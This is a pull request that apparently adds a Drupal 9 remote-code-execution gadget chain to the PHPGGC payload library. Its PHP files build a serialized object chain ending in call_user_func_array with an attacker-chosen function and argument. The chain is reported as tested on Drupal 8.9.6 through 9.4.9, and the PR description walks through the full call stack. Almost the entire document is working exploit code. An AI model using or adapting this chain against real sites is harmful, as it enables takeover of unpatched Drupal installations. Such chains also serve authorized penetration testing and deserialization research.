### PR TITLE
Add Drupal9/RCE1

### DIFF
--- a/gadgetchains/Drupal9/RCE/1/chain.php
+++ b/gadgetchains/Drupal9/RCE/1/chain.php
@@ -1,0 +1,34 @@
+<?php
+
+namespace GadgetChain\Drupal9;
+
+class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '-8.9.6 <= 9.4.9+';
+    public static $vector = '__destruct';
+    public static $author = 'rioru';
+    public static $information = 
+    'Guzzle and Laminas are required for this chain but are bundled by default in Drupal.
+    Uses a __destruct() to call __toString() and finally lands in a call_user_func_array after a few call jumps.
+    Tested on drupal versions from 8.9.6 up to 9.4.9 (latest), might work on slightly older versions.';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+        return (
+            new \GuzzleHttp\Cookie\FileCookieJar(
+                new \Laminas\Diactoros\RelativeStream(
+                    new \GuzzleHttp\Psr7\PumpStream(
+                        new \Drupal\Core\Config\CachedStorage(
+                            new \Drupal\Core\Config\MemoryStorage(),
+                            new \Drupal\Component\DependencyInjection\Container(
+                                ["1000000"=>serialize(["factory"=>$function, "arguments"=>[$parameter]])]
+                                )
+                        )
+                    )
+                )
+            )
+        );
+    }
+}

--- a/gadgetchains/Drupal9/RCE/1/gadgets.php
+++ b/gadgetchains/Drupal9/RCE/1/gadgets.php
@@ -1,0 +1,333 @@
+<?php
+
+namespace GuzzleHttp\Cookie
+{
+    class FileCookieJar
+    {
+        private $filename;
+        public function __construct($filename)
+        {
+            $this->filename = $filename;
+        }
+    /*
+        public function __destruct()
+        {
+            $this->save($this->filename);
+        }
+
+        public function save($filename)
+        {
+            $json = [];
+            foreach ($this as $cookie) {
+                if (CookieJar::shouldPersist($cookie, $this->storeSessionCookies)) {
+                    $json[] = $cookie->toArray();
+                }
+            }
+
+            $jsonStr = \GuzzleHttp\json_encode($json);
+            if (false === file_put_contents($filename, $jsonStr, LOCK_EX)) {
+                throw new \RuntimeException("Unable to save file {$filename}");
+            }
+        }
+    */
+    }
+}
+
+namespace Laminas\Diactoros
+{
+    class RelativeStream
+    {
+        private $decoratedStream;
+
+        public function __construct($decoratedStream)
+        {
+            $this->decoratedStream = $decoratedStream;
+        }
+
+    /*
+        public function __toString() : string
+        {
+            if ($this->isSeekable()) {
+                $this->seek(0);
+            }
+            return $this->getContents();
+        }
+
+        public function getContents() : string
+        {
+            if ($this->tell() < 0) {
+                throw new Exception\InvalidStreamPointerPositionException();
+            }
+            return $this->decoratedStream->getContents();
+        }
+    */
+    }
+}
+
+namespace GuzzleHttp\Psr7
+{
+    class PumpStream
+    {
+        private $source;
+        private $buffer;
+
+        public function __construct($buffer)
+        {
+            $this->source = "1";
+            $this->buffer = $buffer;
+        }
+    /*
+        public function isSeekable()
+        {
+            return false;
+        }
+
+        public function getContents()
+        {
+            $result = '';
+            while (!$this->eof()) {
+                $result .= $this->read(1000000);
+            }
+
+            return $result;
+        }
+
+        public function eof()
+        {
+            return !$this->source;
+        }
+
+        public function read($length)
+        {
+            $data = $this->buffer->read($length);
+            $readLen = strlen($data);
+            $this->tellPos += $readLen;
+            $remaining = $length - $readLen;
+
+            if ($remaining) {
+                $this->pump($remaining);
+                $data .= $this->buffer->read($remaining);
+                $this->tellPos += strlen($data) - $readLen;
+            }
+
+            return $data;
+        }
+    */
+    }
+}
+
+namespace Drupal\Core\Config
+{
+    class CachedStorage
+    {
+        protected $storage;
+        protected $cache;
+
+        public function __construct($storage, $cache) {
+            $this->storage = $storage;
+            $this->cache = $cache;
+        }
+    /*
+        public function read($name) {
+            $cache_key = $this->getCacheKey($name);
+            if ($cache = $this->cache->get($cache_key)) {
+                // The cache contains either the cached configuration data or FALSE
+                // if the configuration file does not exist.
+                return $cache->data;
+            }
+            // Read from the storage on a cache miss and cache the data. Also cache
+            // information about missing configuration objects.
+            $data = $this->storage->read($name);
+            $this->cache->set($cache_key, $data);
+            return $data;
+        }
+
+        protected function getCacheKey($name) {
+            return $this->getCollectionPrefix() . $name;
+        }
+
+        protected function getCollectionPrefix() {
+            $collection = $this->storage->getCollectionName();
+            if ($collection == StorageInterface::DEFAULT_COLLECTION) {
+                return '';
+            }
+            return $collection . ':';
+        }
+    */
+    }
+
+    class MemoryStorage
+    {
+        protected $collection;
+
+        public function __construct()
+        {
+            $this->collection = "";
+        }
+    /*
+        public function getCollectionName() {
+            return $this->collection;
+        }
+    */
+    }
+}
+
+namespace Drupal\Component\DependencyInjection
+{
+    class Container
+    {
+        protected $serviceDefinitions;
+
+        public function __construct($serviceDefinitions) {
+            $this->serviceDefinitions = $serviceDefinitions;
+        }
+    
+    /*
+        public function get($id, $invalid_behavior = ContainerInterface::EXCEPTION_ON_INVALID_REFERENCE) {
+            if ($this->hasParameter('_deprecated_service_list')) {
+                if ($deprecation = $this->getParameter('_deprecated_service_list')[$id] ?? '') {
+                @trigger_error($deprecation, E_USER_DEPRECATED);
+                }
+            }
+            if (isset($this->aliases[$id])) {
+                $id = $this->aliases[$id];
+            }
+
+            // Re-use shared service instance if it exists.
+            if (isset($this->services[$id]) || ($invalid_behavior === ContainerInterface::NULL_ON_INVALID_REFERENCE && array_key_exists($id, $this->services))) {
+                return $this->services[$id];
+            }
+
+            if (isset($this->loading[$id])) {
+                throw new ServiceCircularReferenceException($id, array_keys($this->loading));
+            }
+
+            $definition = $this->serviceDefinitions[$id] ?? NULL;
+
+            if (!$definition && $invalid_behavior === ContainerInterface::EXCEPTION_ON_INVALID_REFERENCE) {
+                if (!$id) {
+                throw new ServiceNotFoundException('');
+                }
+
+                throw new ServiceNotFoundException($id, NULL, NULL, $this->getServiceAlternatives($id));
+            }
+
+            // In case something else than ContainerInterface::NULL_ON_INVALID_REFERENCE
+            // is used, the actual wanted behavior is to re-try getting the service at a
+            // later point.
+            if (!$definition) {
+                return;
+            }
+
+            // Definition is a keyed array, so [0] is only defined when it is a
+            // serialized string.
+            if (isset($definition[0])) {
+                $definition = unserialize($definition);
+            }
+
+            // Now create the service.
+            $this->loading[$id] = TRUE;
+
+            try {
+                $service = $this->createService($definition, $id);
+            }
+            catch (\Exception $e) {
+                unset($this->loading[$id]);
+                unset($this->services[$id]);
+
+                if (ContainerInterface::EXCEPTION_ON_INVALID_REFERENCE !== $invalid_behavior) {
+                return;
+                }
+
+                throw $e;
+            }
+
+            unset($this->loading[$id]);
+
+            return $service;
+        }
+
+        public function hasParameter($name) {
+            return isset($this->parameters[$name]) || array_key_exists($name, $this->parameters);
+        }
+
+        protected function createService(array $definition, $id) {
+            if (isset($definition['synthetic']) && $definition['synthetic'] === TRUE) {
+                throw new RuntimeException(sprintf('You have requested a synthetic service ("%s"). The service container does not know how to construct this service. The service will need to be set before it is first used.', $id));
+            }
+
+            $arguments = [];
+            if (isset($definition['arguments'])) {
+                $arguments = $definition['arguments'];
+
+                if ($arguments instanceof \stdClass) {
+                $arguments = $this->resolveServicesAndParameters($arguments);
+                }
+            }
+
+            if (isset($definition['file'])) {
+                $file = $this->frozen ? $definition['file'] : current($this->resolveServicesAndParameters([$definition['file']]));
+                require_once $file;
+            }
+
+            if (isset($definition['factory'])) {
+                $factory = $definition['factory'];
+                if (is_array($factory)) {
+                $factory = $this->resolveServicesAndParameters([$factory[0], $factory[1]]);
+                }
+                elseif (!is_string($factory)) {
+                throw new RuntimeException(sprintf('Cannot create service "%s" because of invalid factory', $id));
+                }
+
+                $service = call_user_func_array($factory, $arguments);
+            }
+            else {
+                $class = $this->frozen ? $definition['class'] : current($this->resolveServicesAndParameters([$definition['class']]));
+                $service = new $class(...$arguments);
+            }
+
+            if (!isset($definition['shared']) || $definition['shared'] !== FALSE) {
+                $this->services[$id] = $service;
+            }
+
+            if (isset($definition['calls'])) {
+                foreach ($definition['calls'] as $call) {
+                $method = $call[0];
+                $arguments = [];
+                if (!empty($call[1])) {
+                    $arguments = $call[1];
+                    if ($arguments instanceof \stdClass) {
+                    $arguments = $this->resolveServicesAndParameters($arguments);
+                    }
+                }
+                call_user_func_array([$service, $method], $arguments);
+                }
+            }
+
+            if (isset($definition['properties'])) {
+                if ($definition['properties'] instanceof \stdClass) {
+                $definition['properties'] = $this->resolveServicesAndParameters($definition['properties']);
+                }
+                foreach ($definition['properties'] as $key => $value) {
+                $service->{$key} = $value;
+                }
+            }
+
+            if (isset($definition['configurator'])) {
+                $callable = $definition['configurator'];
+                if (is_array($callable)) {
+                $callable = $this->resolveServicesAndParameters($callable);
+                }
+
+                if (!is_callable($callable)) {
+                throw new InvalidArgumentException(sprintf('The configurator for class "%s" is not a callable.', get_class($service)));
+                }
+
+                call_user_func($callable, $service);
+            }
+
+            return $service;
+        }
+    */
+    }
+}


### PR DESCRIPTION
Hello,

Here's a gadgetchain for Drupal 9, should work from something like Drupal 8.9.6 up to the latest Drupal 9 version (at the time of this pull request, it is 9.4.9).

The call stack is the following:

1. \GuzzleHttp\Cookie\FileCookieJar->__destruct()
2. \Laminas\Diactoros\RelativeStream->__toString()
3. \GuzzleHttp\Psr7\PumpStream->getContents()
4. \Drupal\Core\Config\CachedStorage->read()
5. \Drupal\Component\DependencyInjection\Container->get()
6. \Drupal\Component\DependencyInjection\Container->createService()
7. call_user_func_array()

🚀